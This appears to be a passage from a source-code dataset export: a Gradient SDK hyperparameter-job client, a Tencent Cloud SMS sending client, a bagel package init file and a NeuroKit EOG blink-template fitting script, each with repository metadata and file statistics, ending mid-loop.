        'Tags': ([Tag], False, 'Mutable', 'http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-elasticsearch-domain.html#cfn-elasticsearch-domain-tags')
    }
| 61.899038
| 274
| 0.692427
| 1,059
| 12,875
| 8.412653
| 0.07271
| 0.174879
| 0.051858
| 0.080144
| 0.838478
| 0.831743
| 0.758896
| 0.758896
| 0.758896
| 0.758896
| 0
| 0.001109
| 0.159689
| 12,875
| 207
| 275
| 62.198068
| 0.82235
| 0.624777
| 0
| 0.114286
| 0
| 0.542857
| 0.744433
| 0.020812
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.085714
| 0
| 0.342857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
fbe563ee9ba6fb943f26f3dba6dca921de366d83
| 10,668
|
py
|
Python
|
gradient/api_sdk/clients/hyperparameter_client.py
|
vishalbelsare/gradient-cli
|
c0e06252925cad3ad73d47ded1100f6b0cb0989a
|
[
"0BSD"
] | 52
|
2019-06-10T04:20:00.000Z
|
2021-12-06T01:13:26.000Z
|
gradient/api_sdk/clients/hyperparameter_client.py
|
vishalbelsare/gradient-cli
|
c0e06252925cad3ad73d47ded1100f6b0cb0989a
|
[
"0BSD"
] | 125
|
2019-06-05T16:34:19.000Z
|
2022-03-30T18:46:06.000Z
|
gradient/api_sdk/clients/hyperparameter_client.py
|
vishalbelsare/gradient-cli
|
c0e06252925cad3ad73d47ded1100f6b0cb0989a
|
[
"0BSD"
] | 11
|
2019-07-16T06:48:55.000Z
|
2021-12-15T12:41:51.000Z
|
from . import base_client
from .base_client import TagsSupportMixin
from .. import models, repositories
class HyperparameterJobsClient(TagsSupportMixin, base_client.BaseClient):
entity = "experiment"
def create(
self,
name,
project_id,
tuning_command,
worker_container,
worker_machine_type,
worker_command,
worker_count,
worker_container_user=None,
worker_registry_username=None,
worker_registry_password=None,
is_preemptible=False,
ports=None,
workspace_url=None,
artifact_directory=None,
cluster_id=None,
experiment_env=None,
trigger_event_id=None,
model_type=None,
model_path=None,
dockerfile_path=None,
hyperparameter_server_registry_username=None,
hyperparameter_server_registry_password=None,
hyperparameter_server_container=None,
hyperparameter_server_container_user=None,
hyperparameter_server_machine_type=None,
working_directory=None,
use_dockerfile=False,
tags=None,
):
"""Create hyperparameter tuning job
:param str name: Name of new experiment [required]
:param str project_id: Project ID [required]
:param str tuning_command: Tuning command [required]
:param str worker_container: Worker container [required]
:param str worker_machine_type: Worker machine type [required]
:param str worker_command: Worker command [required]
:param int worker_count: Worker count [required]
:param str worker_container_user: Worker Container user
:param str worker_registry_username: Worker registry username
:param str worker_registry_password: Worker registry password
:param bool is_preemptible: Flag: is preemptible
:param str ports: Port to use in new experiment
:param str workspace_url: Project git repository url
:param str artifact_directory: Artifacts directory
:param str cluster_id: Cluster ID
:param dict experiment_env: Environment variables (in JSON)
:param str trigger_event_id: GradientCI trigger event id
:param str model_type: Model type
:param str model_path: Model path
:param str dockerfile_path: Path to dockerfile in project
:param str hyperparameter_server_registry_username: Hyperparameter server registry username
:param str hyperparameter_server_registry_password: Hyperparameter server registry password
:param str hyperparameter_server_container: Hyperparameter server container
:param str hyperparameter_server_container_user: Hyperparameter server container user
:param str hyperparameter_server_machine_type: Hyperparameter server machine type
:param str working_directory: Working directory for the experiment
:param bool use_dockerfile: Flag: use dockerfile
:param list[str] tags: List of tags
:returns: ID of a new job
:rtype: str
"""
if not is_preemptible:
is_preemptible = None
if use_dockerfile is False:
use_dockerfile = None
hyperparameter = models.Hyperparameter(
name=name,
project_id=project_id,
tuning_command=tuning_command,
worker_container=worker_container,
worker_container_user=worker_container_user,
worker_machine_type=worker_machine_type,
worker_command=worker_command,
worker_count=worker_count,
worker_registry_username=worker_registry_username,
worker_registry_password=worker_registry_password,
is_preemptible=is_preemptible,
ports=ports,
workspace_url=workspace_url,
artifact_directory=artifact_directory,
cluster_id=cluster_id,
experiment_env=experiment_env,
trigger_event_id=trigger_event_id,
model_type=model_type,
model_path=model_path,
dockerfile_path=dockerfile_path,
hyperparameter_server_machine_type=hyperparameter_server_machine_type,
hyperparameter_server_registry_username=hyperparameter_server_registry_username,
hyperparameter_server_registry_password=hyperparameter_server_registry_password,
hyperparameter_server_container=hyperparameter_server_container,
hyperparameter_server_container_user=hyperparameter_server_container_user,
working_directory=working_directory,
use_dockerfile=use_dockerfile,
)
repository = self.build_repository(repositories.CreateHyperparameterJob)
handle = repository.create(hyperparameter)
if tags:
self.add_tags(entity_id=handle, tags=tags)
return handle
def run(
self,
name,
project_id,
tuning_command,
worker_container,
worker_machine_type,
worker_command,
worker_count,
worker_registry_username=None,
worker_registry_password=None,
worker_container_user=None,
is_preemptible=False,
ports=None,
workspace_url=None,
artifact_directory=None,
cluster_id=None,
experiment_env=None,
trigger_event_id=None,
model_type=None,
model_path=None,
dockerfile_path=None,
hyperparameter_server_registry_username=None,
hyperparameter_server_registry_password=None,
hyperparameter_server_container_user=None,
hyperparameter_server_container=None,
hyperparameter_server_machine_type=None,
working_directory=None,
use_dockerfile=False,
tags=None,
):
"""Create and start hyperparameter tuning job
:param str name: Name of new experiment [required]
:param str project_id: Project ID [required]
:param str tuning_command: Tuning command [required]
:param str worker_container: Worker container [required]
:param str worker_machine_type: Worker machine type [required]
:param str worker_command: Worker command [required]
:param int worker_count: Worker count [required]
:param str worker_container_user: Worker container user
:param worker_registry_password: Worker registry password
:param worker_registry_username: Worker registry username
:param bool is_preemptible: Flag: is preemptible
:param str ports: Port to use in new experiment
:param str workspace_url: Project git repository url
:param str artifact_directory: Artifacts directory
:param str cluster_id: Cluster ID
:param dict experiment_env: Environment variables (in JSON)
:param str trigger_event_id: GradientCI trigger event id
:param str model_type: Model type
:param str model_path: Model path
:param str dockerfile_path: Path to dockerfile
:param str hyperparameter_server_registry_username: container registry username
:param str hyperparameter_server_registry_password: container registry password
:param str hyperparameter_server_container_user: hps container user
:param str hyperparameter_server_container: hps container
:param str hyperparameter_server_machine_type: hps machine type
:param str working_directory: Working directory for the experiment
:param bool use_dockerfile: Flag: use dockerfile
:param list[str] tags: List of tags
:returns: ID of a new job
:rtype: str
"""
if not is_preemptible:
is_preemptible = None
if use_dockerfile is False:
use_dockerfile = None
hyperparameter = models.Hyperparameter(
name=name,
project_id=project_id,
tuning_command=tuning_command,
worker_container=worker_container,
worker_machine_type=worker_machine_type,
worker_command=worker_command,
worker_count=worker_count,
worker_container_user=worker_container_user,
worker_registry_username=worker_registry_username,
worker_registry_password=worker_registry_password,
is_preemptible=is_preemptible,
ports=ports,
workspace_url=workspace_url,
artifact_directory=artifact_directory,
cluster_id=cluster_id,
experiment_env=experiment_env,
trigger_event_id=trigger_event_id,
model_type=model_type,
model_path=model_path,
dockerfile_path=dockerfile_path,
hyperparameter_server_registry_username=hyperparameter_server_registry_username,
hyperparameter_server_registry_password=hyperparameter_server_registry_password,
hyperparameter_server_container_user=hyperparameter_server_container_user,
hyperparameter_server_container=hyperparameter_server_container,
hyperparameter_server_machine_type=hyperparameter_server_machine_type,
working_directory=working_directory,
use_dockerfile=use_dockerfile,
)
repository = self.build_repository(repositories.CreateAndStartHyperparameterJob)
handle = repository.create(hyperparameter)
if tags:
self.add_tags(entity_id=handle, tags=tags)
return handle
def get(self, id):
    """Retrieve a single hyperparameter tuning job by its ID.

    :param str id: Hyperparameter job id
    :returns: instance of Hyperparameter
    :rtype: models.Hyperparameter
    """
    return self.build_repository(repositories.GetHyperparameterTuningJob).get(id=id)
def start(self, id):
    """Start an existing hyperparameter tuning job.

    :param str id: Hyperparameter job id
    :raises: exceptions.GradientSdkError
    """
    self.build_repository(repositories.StartHyperparameterTuningJob).start(id_=id)
def list(self):
    """List all hyperparameter tuning jobs.

    :rtype: list[models.Hyperparameter]
    """
    return self.build_repository(repositories.ListHyperparameterJobs).list()
| 41.189189
| 99
| 0.676134
| 1,095
| 10,668
| 6.283105
| 0.091324
| 0.053488
| 0.073256
| 0.040698
| 0.903634
| 0.889826
| 0.855087
| 0.786628
| 0.672965
| 0.672965
| 0
| 0
| 0.274934
| 10,668
| 258
| 100
| 41.348837
| 0.889463
| 0.339989
| 0
| 0.857143
| 0
| 0
| 0.001552
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.032468
| false
| 0.051948
| 0.019481
| 0
| 0.090909
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
22268766ad4731de4ee56b741bca3e66dd7d007a
| 110
|
py
|
Python
|
bagel/__init__.py
|
alumik/bagel-torch
|
455d6e000263f15d85b49fa1857108393c8aaf08
|
[
"MIT"
] | 1
|
2022-02-13T01:05:53.000Z
|
2022-02-13T01:05:53.000Z
|
bagel/__init__.py
|
AlumiK/bagel-pytorch
|
455d6e000263f15d85b49fa1857108393c8aaf08
|
[
"MIT"
] | null | null | null |
bagel/__init__.py
|
AlumiK/bagel-pytorch
|
455d6e000263f15d85b49fa1857108393c8aaf08
|
[
"MIT"
] | 1
|
2022-03-04T07:40:03.000Z
|
2022-03-04T07:40:03.000Z
|
import bagel.data
import bagel.models
import bagel.testing
import bagel.utils
from bagel.models import Bagel
| 15.714286
| 30
| 0.836364
| 17
| 110
| 5.411765
| 0.411765
| 0.597826
| 0.369565
| 0.478261
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.118182
| 110
| 6
| 31
| 18.333333
| 0.948454
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
3f2f177344f61f137f667540ae0067f32f600333
| 10,427
|
py
|
Python
|
moni-alert/bin/qcloudsms_py/sms.py
|
jimdn/monitor-toolkits
|
d0e3c1215c2b17047f9eae061b37efb3bb9eb6f8
|
[
"MIT"
] | 4
|
2019-07-04T10:01:16.000Z
|
2022-01-23T07:15:52.000Z
|
moni-alert/bin/qcloudsms_py/sms.py
|
jimdn/monitor-toolkits
|
d0e3c1215c2b17047f9eae061b37efb3bb9eb6f8
|
[
"MIT"
] | null | null | null |
moni-alert/bin/qcloudsms_py/sms.py
|
jimdn/monitor-toolkits
|
d0e3c1215c2b17047f9eae061b37efb3bb9eb6f8
|
[
"MIT"
] | 5
|
2019-08-11T14:22:14.000Z
|
2020-12-03T03:13:44.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function
import json
from qcloudsms_py import util
from qcloudsms_py.httpclient import HTTPRequest
class SmsSingleSender(object):
    """Sends a single SMS message through the Tencent Cloud SMS v5 API."""

    def __init__(self, appid, appkey):
        self._appid = appid
        self._appkey = appkey
        # Fixed: removed stray trailing semicolon after the URL literal.
        self._url = "https://yun.tim.qq.com/v5/tlssmssvr/sendsms"

    def send(self, sms_type, nation_code, phone_number, msg,
             extend="", ext=""):
        """Send single SMS message.

        :param sms_type: SMS message type, Enum{0: normal SMS, 1: marketing SMS}
        :param nation_code: nation dialing code, e.g. China is 86, USA is 1
        :param phone_number: phone number
        :param msg: SMS message content
        :param extend: extend field, default is empty string
        :param ext: ext field, content will be returned by server as it is
        """
        rand = util.get_random()
        now = util.get_current_time()
        # The random value must match the one used in the signature below.
        url = "{}?sdkappid={}&random={}".format(
            self._url, self._appid, rand)
        req = HTTPRequest(
            url=url,
            method="POST",
            headers={"Content-Type": "application/json"},
            body={
                "tel": {
                    "nationcode": str(nation_code),
                    "mobile": str(phone_number)
                },
                "type": int(sms_type),
                "msg": str(msg),
                "sig": util.calculate_signature(
                    self._appkey, rand, now, [phone_number]),
                "time": now,
                "extend": str(extend),
                "ext": str(ext)
            },
            connect_timeout=60,
            request_timeout=60
        )
        return util.api_request(req)

    def send_with_param(self, nation_code, phone_number, template_id,
                        params, sign="", extend="", ext=""):
        """Send single SMS message with template paramters.

        :param nation_code: nation dialing code, e.g. China is 86, USA is 1
        :param phone_number: phone number
        :param template_id: template id
        :param params: template parameters
        :param sign: Sms user sign
        :param extend: extend field, default is empty string
        :param ext: ext field, content will be returned by server as it is
        """
        rand = util.get_random()
        now = util.get_current_time()
        url = "{}?sdkappid={}&random={}".format(
            self._url, self._appid, rand)
        req = HTTPRequest(
            url=url,
            method="POST",
            headers={"Content-Type": "application/json"},
            body={
                "tel": {
                    "nationcode": str(nation_code),
                    "mobile": str(phone_number)
                },
                "sign": str(sign),
                "tpl_id": int(template_id),
                "params": params,
                "sig": util.calculate_signature(
                    self._appkey, rand, now, [phone_number]),
                "time": now,
                "extend": str(extend),
                "ext": str(ext)
            },
            connect_timeout=60,
            request_timeout=60
        )
        return util.api_request(req)
class SmsMultiSender(object):
    """Sends one SMS message to multiple phone numbers at once via the
    Tencent Cloud SMS v5 API."""

    def __init__(self, appid, appkey):
        self._appid = appid
        self._appkey = appkey
        self._url = "https://yun.tim.qq.com/v5/tlssmssvr/sendmultisms2"

    def send(self, sms_type, nation_code, phone_numbers, msg,
             extend="", ext=""):
        """Send a SMS messages to multiple phones at once.

        :param sms_type: SMS message type, Enum{0: normal SMS, 1: marketing SMS}
        :param nation_code: nation dialing code, e.g. China is 86, USA is 1
        :param phone_numbers: phone number array
        :param msg: SMS message content
        :param extend: extend field, default is empty string
        :param ext: ext field, content will be returned by server as it is
        """
        rand = util.get_random()
        now = util.get_current_time()
        url = "{}?sdkappid={}&random={}".format(
            self._url, self._appid, rand)
        req = HTTPRequest(
            url=url,
            method="POST",
            headers={"Content-Type": "application/json"},
            body={
                "tel": [{"nationcode": nation_code, "mobile": pn}
                        for pn in phone_numbers],
                "type": int(sms_type),
                "msg": str(msg),
                # Multi-send signs over the whole number list.
                "sig": util.calculate_signature(
                    self._appkey, rand, now, phone_numbers),
                "time": now,
                "extend": str(extend),
                "ext": str(ext)
            },
            connect_timeout=60,
            request_timeout=60
        )
        return util.api_request(req)

    def send_with_param(self, nation_code, phone_numbers, template_id,
                        params, sign="", extend="", ext=""):
        """
        Send a SMS messages with template parameters to multiple
        phones at once.

        :param nation_code: nation dialing code, e.g. China is 86, USA is 1
        :param phone_numbers: multiple phone numbers
        :param template_id: template id
        :param params: template parameters
        :param sign: Sms user sign
        :param extend: extend field, default is empty string
        :param ext: ext field, content will be returned by server as it is
        """
        rand = util.get_random()
        now = util.get_current_time()
        url = "{}?sdkappid={}&random={}".format(
            self._url, self._appid, rand)
        req = HTTPRequest(
            url=url,
            method="POST",
            headers={"Content-Type": "application/json"},
            body={
                "tel": [{"nationcode": nation_code, "mobile": pn}
                        for pn in phone_numbers],
                "sign": sign,
                "tpl_id": int(template_id),
                "params": params,
                "sig": util.calculate_signature(
                    self._appkey, rand, now, phone_numbers),
                "time": now,
                "extend": str(extend),
                "ext": str(ext)
            },
            connect_timeout=60,
            request_timeout=60
        )
        return util.api_request(req)
class SmsStatusPuller(object):
    """Pulls delivery (callback) and reply status of sent SMS messages from
    the Tencent Cloud SMS v5 API."""

    def __init__(self, appid, appkey):
        self._appid = appid
        self._appkey = appkey
        self._url = "https://yun.tim.qq.com/v5/tlssmssvr/pullstatus"

    def _pull(self, sms_type, max_num):
        """Pull SMS message status.

        :param sms_type: status type, Enum{0: callback (delivery) status, 1: reply status}
        :param max_num: maximum number of message status
        """
        rand = util.get_random()
        now = util.get_current_time()
        url = "{}?sdkappid={}&random={}".format(
            self._url, self._appid, rand)
        req = HTTPRequest(
            url=url,
            method="POST",
            headers={"Content-Type": "application/json"},
            body={
                # Status pulling signs without phone numbers.
                "sig": util.calculate_signature(
                    self._appkey, rand, now),
                "time": now,
                "type": sms_type,
                "max": max_num
            },
            connect_timeout=60,
            request_timeout=60
        )
        return util.api_request(req)

    def pull_callback(self, max_num):
        """Pull callback SMS messages status.

        :param max_num: maximum number of message status
        """
        return self._pull(0, max_num)

    def pull_reply(self, max_num):
        """Pull reply SMS messages status.

        :param max_num: maximum number of message status
        """
        return self._pull(1, max_num)
class SmsMobileStatusPuller(object):
    """Pulls SMS status (delivery/reply) for a single mobile number within a
    time window, via the Tencent Cloud SMS v5 API."""

    def __init__(self, appid, appkey):
        # Fixed: removed stray trailing semicolons.
        self._appid = appid
        self._appkey = appkey
        self._url = "https://yun.tim.qq.com/v5/tlssmssvr/pullstatus4mobile"

    def _pull(self, msg_type, nation_code, mobile, begin_time, end_time, max_num):
        """Pull SMS messages status for single mobile.

        :param msg_type: SMS message type, Enum{0: normal SMS, 1: marketing SMS}
        :param nation_code: nation dialing code, e.g. China is 86, USA is 1
        :param mobile: mobile number
        :param begin_time: begin time, unix timestamp
        :param end_time: end time, unix timestamp
        :param max_num: maximum number of message status
        """
        rand = util.get_random()
        now = util.get_current_time()
        url = "{}?sdkappid={}&random={}".format(
            self._url, self._appid, rand)
        req = HTTPRequest(
            url=url,
            method="POST",
            headers={"Content-Type": "application/json"},
            body={
                "sig": util.calculate_signature(
                    self._appkey, rand, now),
                "type": msg_type,
                "time": now,
                "max": max_num,
                "begin_time": begin_time,
                "end_time": end_time,
                "nationcode": str(nation_code),
                "mobile": str(mobile)
            },
            connect_timeout=60,
            request_timeout=60
        )
        return util.api_request(req)

    def pull_callback(self, nation_code, mobile, begin_time,
                      end_time, max_num):
        """Pull callback SMS message status for single mobile.

        :param nation_code: nation dialing code, e.g. China is 86, USA is 1
        :param mobile: mobile number
        :param begin_time: begin time, unix timestamp
        :param end_time: end time, unix timestamp
        :param max_num: maximum number of message status
        """
        return self._pull(0, nation_code, mobile,
                          begin_time, end_time, max_num)

    def pull_reply(self, nation_code, mobile, begin_time,
                   end_time, max_num):
        """Pull reply SMS message status for single mobile.

        :param nation_code: nation dialing code, e.g. China is 86, USA is 1
        :param mobile: mobile number
        :param begin_time: begin time, unix timestamp
        :param end_time: end time, unix timestamp
        :param max_num: maximum number of message status
        """
        return self._pull(1, nation_code, mobile,
                          begin_time, end_time, max_num)
| 35.587031
| 82
| 0.544356
| 1,177
| 10,427
| 4.649108
| 0.119796
| 0.038377
| 0.02924
| 0.026864
| 0.895102
| 0.882858
| 0.846857
| 0.834795
| 0.822734
| 0.808845
| 0
| 0.009426
| 0.348806
| 10,427
| 292
| 83
| 35.708904
| 0.796465
| 0.266711
| 0
| 0.725806
| 0
| 0
| 0.108864
| 0.020228
| 0
| 0
| 0
| 0
| 0
| 1
| 0.075269
| false
| 0
| 0.021505
| 0
| 0.172043
| 0.005376
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3f43c5d5a4444a34f66cb621377fefb4aeb459f9
| 12,452
|
py
|
Python
|
benchmarks/eog_blinktemplate/script.py
|
raimonpv/NeuroKit
|
cb37d83ee20d6a13a91c4848aa435f41e979e203
|
[
"MIT"
] | null | null | null |
benchmarks/eog_blinktemplate/script.py
|
raimonpv/NeuroKit
|
cb37d83ee20d6a13a91c4848aa435f41e979e203
|
[
"MIT"
] | null | null | null |
benchmarks/eog_blinktemplate/script.py
|
raimonpv/NeuroKit
|
cb37d83ee20d6a13a91c4848aa435f41e979e203
|
[
"MIT"
] | null | null | null |
"""This is the same code as in the article, but in a Python script.
"""
import matplotlib.pyplot as plt
import neurokit2 as nk
import numpy as np
import pandas as pd
import scipy.optimize
import scipy.signal
import scipy.stats
def fit_gamma(x, loc, a, scale):
    """Gamma-PDF blink template over `x` rescaled to [0, 10], normalized to a peak of 1."""
    t = nk.rescale(x, to=[0, 10])
    density = scipy.stats.gamma.pdf(t, a=a, loc=loc, scale=scale)
    return density / np.max(density)
def fit_scr(x, time_peak, rise, decay1, decay2):
    """SCR-shaped blink template: a Gaussian rise convolved with a bi-exponential
    decay, truncated to len(x) and normalized to a peak of 1. `x` is rescaled
    to [0, 10] first."""
    t = nk.rescale(x, to=[0, 10])
    gaussian = np.exp(-((t - time_peak) ** 2) / (2 * rise ** 2))
    decay = np.exp(-t / decay1) + np.exp(-t / decay2)
    response = np.convolve(gaussian, decay)[0 : len(t)]
    return response / np.max(response)
# Starting parameters
# Plot both candidate templates at their hand-picked starting parameters,
# then prepare empty frames to accumulate per-blink fitted parameters.
plt.plot(fit_gamma(np.arange(100), 3, 3, 0.5), linewidth=2, linestyle='-', color="#4CAF50", label='Gamma')
plt.plot(fit_scr(np.arange(100), 3.5, 0.5, 1, 1), linewidth=2, linestyle='-', color="#9C27B0", label='SCR')
params_gamma = pd.DataFrame(columns=["loc", "a", "scale", "Participant", "Task"])
params_scr = pd.DataFrame(columns=["time_peak", "rise", "decay1", "decay2", "Participant", "Task"])
# For each task file and two participants, detect blinks in the vertical EOG,
# epoch around each blink, and fit both templates per event.
for i in range(4):
    print("Task: " + str(i))
    data = pd.read_csv("../../data/eogdb/eogdb_task" + str(i + 1) + ".csv")
    for j, participant in enumerate(np.unique(data["Participant"])[1:3]):
        print(" - " + str(j + 1))
        segment = data[data["Participant"] == participant]
        signal = segment["vEOG"]
        cleaned = nk.eog_clean(signal, sampling_rate=200, method='neurokit')
        blinks = nk.signal_findpeaks(cleaned, relative_height_min=1.5)["Peaks"]
        events = nk.epochs_create(cleaned, blinks, sampling_rate=200, epochs_start=-0.4, epochs_end=0.6)
        events = nk.epochs_to_array(events)  # Convert to 2D array
        x = np.linspace(0, 100, num=len(events))
        p_gamma = np.full((events.shape[1], 3), np.nan)
        p_bateman = np.full((events.shape[1], 3), np.nan)  # NOTE(review): never used afterwards
        p_scr = np.full((events.shape[1], 4), np.nan)
        # NOTE(review): this inner loop reuses `i`, shadowing the task index above
        # (harmless here since `i` is not read again in the outer body, but fragile).
        for i in range(events.shape[1]):
            if np.isnan(events[:, i]).any():
                break
            events[:, i] = nk.rescale(events[:, i], to=[0, 1])  # Reshape to 0-1 scale
            try:
                p_gamma[i, :], _ = scipy.optimize.curve_fit(fit_gamma, x, events[:, i], p0=[3, 3, 0.5])
                p_scr[i, :], _ = scipy.optimize.curve_fit(fit_scr, x, events[:, i], p0=[3.5, 0.5, 1, 1])
            except RuntimeError:
                pass  # curve_fit failed to converge; row stays NaN and is dropped below
        # Drop events where fitting failed (NaN rows), then tag provenance.
        p_gamma = pd.DataFrame(p_gamma[~np.isnan(p_gamma).any(axis=1)], columns=["loc", "a", "scale"])
        p_gamma["Participant"] = participant
        p_gamma["Task"] = data["Task"][0]
        params_gamma = pd.concat([params_gamma, p_gamma], axis=0)
        p_scr = pd.DataFrame(p_scr[~np.isnan(p_scr).any(axis=1)], columns=["time_peak", "rise", "decay1", "decay2"])
        p_scr["Participant"] = participant
        p_scr["Task"] = data["Task"][0]
        params_scr = pd.concat([params_scr, p_scr], axis=0)
# Build the median-parameter templates and overlay them on task-3 blink events.
data = pd.read_csv("../../data/eogdb/eogdb_task3.csv")
cleaned = nk.eog_clean(data["vEOG"], sampling_rate=200, method='neurokit')
blinks = nk.signal_findpeaks(cleaned, relative_height_min=1.5)["Peaks"][:-1]
events = nk.epochs_create(cleaned, blinks, sampling_rate=200, epochs_start=-0.4, epochs_end=0.6)
events = nk.epochs_to_array(events)
for i in range(events.shape[1]):
    events[:, i] = nk.rescale(events[:, i], to=[0, 1])  # Reshape to 0-1 scale
x = np.linspace(0, 100, num=len(events))
# Templates use the median of all per-event fitted parameters.
template_gamma = fit_gamma(x, *np.nanmedian(params_gamma.iloc[:, [0, 1, 2]], axis=0))
template_scr = fit_scr(x, *np.nanmedian(params_scr.iloc[:, [0, 1, 2, 3]], axis=0))
plt.plot(events, linewidth=0.02, color="black")
plt.plot(template_gamma, linewidth=2, linestyle='-', color="#4CAF50", label='Gamma')
plt.plot(template_scr, linewidth=2, linestyle='-', color="#9C27B0", label='SCR')
plt.legend(loc="upper right")
plt.show()
# Evaluate fit quality: RMSE of every blink event against each template.
data_rmse = pd.DataFrame(columns=["RMSE", "Index", "Participant", "Task", "Function"])
for i in range(4):
    data = pd.read_csv("../../data/eogdb/eogdb_task" + str(i + 1) + ".csv")
    for j, participant in enumerate(np.unique(data["Participant"])[1:3]):
        segment = data[data["Participant"] == participant]
        signal = segment["vEOG"]
        cleaned = nk.eog_clean(signal, sampling_rate=200, method='neurokit')
        blinks = nk.signal_findpeaks(cleaned, relative_height_min=1.5)["Peaks"]
        events = nk.epochs_create(cleaned, blinks, sampling_rate=200, epochs_start=-0.4, epochs_end=0.6)
        events = nk.epochs_to_array(events)  # Convert to 2D array
        # Rescale
        # NOTE(review): inner loops reuse `i`, shadowing the task index above.
        for i in range(events.shape[1]):
            events[:, i] = nk.rescale(events[:, i], to=[0, 1])  # Reshape to 0-1 scale
        # RMSE - Gamma
        rmse = pd.DataFrame({"RMSE": [nk.fit_rmse(events[:, i], template_gamma) for i in range(events.shape[1])],
                             "Index": range(events.shape[1]),
                             "Participant": [participant]*events.shape[1],
                             "Task": [data["Task"][0]]*events.shape[1],
                             "Function": ["Gamma"] * events.shape[1]})
        rmse["Index"] = rmse["Participant"] + "_" + rmse["Task"] + "_" + rmse["Index"].astype(str)
        data_rmse = pd.concat([data_rmse, rmse], axis=0)
        # RMSE - SCR
        rmse = pd.DataFrame({"RMSE": [nk.fit_rmse(events[:, i], template_scr) for i in range(events.shape[1])],
                             "Index": range(events.shape[1]),
                             "Participant": [participant]*events.shape[1],
                             "Task": [data["Task"][0]]*events.shape[1],
                             "Function": ["SCR"] * events.shape[1]})
        rmse["Index"] = rmse["Participant"] + "_" + rmse["Task"] + "_" + rmse["Index"].astype(str)
        data_rmse = pd.concat([data_rmse, rmse], axis=0)
# Kernel density of RMSE per template; 0.25 marks the rejection threshold used later.
p = data_rmse.pivot(index='Index', columns='Function', values='RMSE').plot.kde()
p.set_xlim(0, 1)
p.axvline(x=0.25, color="red")
plt.show()
# Refit using the median parameters as starting points, keeping only events
# that already resemble a template (RMSE < 0.25) to reject artifacts.
optimal_gamma = np.nanmedian(params_gamma.iloc[:, [0, 1, 2]], axis=0)
optimal_scr = np.nanmedian(params_scr.iloc[:, [0, 1, 2, 3]], axis=0)
params_gamma = pd.DataFrame(columns=["loc", "a", "scale", "Participant", "Task"])
params_scr = pd.DataFrame(columns=["time_peak", "rise", "decay1", "decay2", "Participant", "Task"])
for i in range(4):
    print("Task: " + str(i))
    data = pd.read_csv("../../data/eogdb/eogdb_task" + str(i + 1) + ".csv")
    for j, participant in enumerate(np.unique(data["Participant"])[1:3]):
        print(" - " + str(j + 1))
        segment = data[data["Participant"] == participant]
        signal = segment["vEOG"]
        cleaned = nk.eog_clean(signal, sampling_rate=200, method='neurokit')
        blinks = nk.signal_findpeaks(cleaned, relative_height_min=1.5)["Peaks"]
        events = nk.epochs_create(cleaned, blinks, sampling_rate=200, epochs_start=-0.4, epochs_end=0.6)
        events = nk.epochs_to_array(events)  # Convert to 2D array
        x = np.linspace(0, 100, num=len(events))
        p_gamma = np.full((events.shape[1], 3), np.nan)
        p_scr = np.full((events.shape[1], 4), np.nan)
        # NOTE(review): inner loop reuses `i`, shadowing the task index above.
        for i in range(events.shape[1]):
            if np.isnan(events[:, i]).any():
                break
            events[:, i] = nk.rescale(events[:, i], to=[0, 1])  # Reshape to 0-1 scale
            if nk.fit_rmse(events[:, i], template_gamma) < 0.25:
                try:
                    p_gamma[i, :], _ = scipy.optimize.curve_fit(fit_gamma, x, events[:, i], p0=optimal_gamma)
                except RuntimeError:
                    pass  # non-convergence: row stays NaN and is dropped below
            if nk.fit_rmse(events[:, i], template_scr) < 0.25:
                try:
                    p_scr[i, :], _ = scipy.optimize.curve_fit(fit_scr, x, events[:, i], p0=optimal_scr)
                except RuntimeError:
                    pass
        # Drop events where fitting failed or was skipped, then tag provenance.
        p_gamma = pd.DataFrame(p_gamma[~np.isnan(p_gamma).any(axis=1)], columns=["loc", "a", "scale"])
        p_gamma["Participant"] = participant
        p_gamma["Task"] = data["Task"][0]
        params_gamma = pd.concat([params_gamma, p_gamma], axis=0)
        p_scr = pd.DataFrame(p_scr[~np.isnan(p_scr).any(axis=1)], columns=["time_peak", "rise", "decay1", "decay2"])
        p_scr["Participant"] = participant
        p_scr["Task"] = data["Task"][0]
        params_scr = pd.concat([params_scr, p_scr], axis=0)
# Build optimized templates from the filtered refit and compare all four visually.
x = np.linspace(0, 100, num=len(events))
template_gamma2 = fit_gamma(x, *np.nanmedian(params_gamma.iloc[:, [0, 1, 2]], axis=0))
template_scr2 = fit_scr(x, *np.nanmedian(params_scr.iloc[:, [0, 1, 2, 3]], axis=0))
data = pd.read_csv("../../data/eogdb/eogdb_task3.csv")
cleaned = nk.eog_clean(data["vEOG"], sampling_rate=200, method='neurokit')
blinks = nk.signal_findpeaks(cleaned, relative_height_min=1.5)["Peaks"]
events = nk.epochs_create(cleaned, blinks, sampling_rate=200, epochs_start=-0.4, epochs_end=0.6)
events = nk.epochs_to_array(events)
for i in range(events.shape[1]):
